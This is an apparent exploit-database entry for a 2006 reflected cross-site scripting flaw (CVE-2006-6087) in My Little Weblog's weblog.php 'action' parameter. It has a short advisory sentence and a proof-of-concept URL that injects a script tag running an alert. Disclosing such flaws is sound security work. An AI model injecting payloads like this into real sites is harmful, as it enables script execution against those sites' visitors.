My Little Weblog 2006.11.21 - 'Weblog.php' Cross-Site Scripting
Author: the_Edit0r
type: webapps
platform: php
port:
date_added: 2006-11-21
date_updated: 2013-10-24
verified: 1
codes: CVE-2006-6087;OSVDB-30570
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/21238/info
My Little Weblog is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to the 'action' parameter of the 'weblog.php' script.
www.example.com/weblog.php?action="><script>alert('XSS')</script><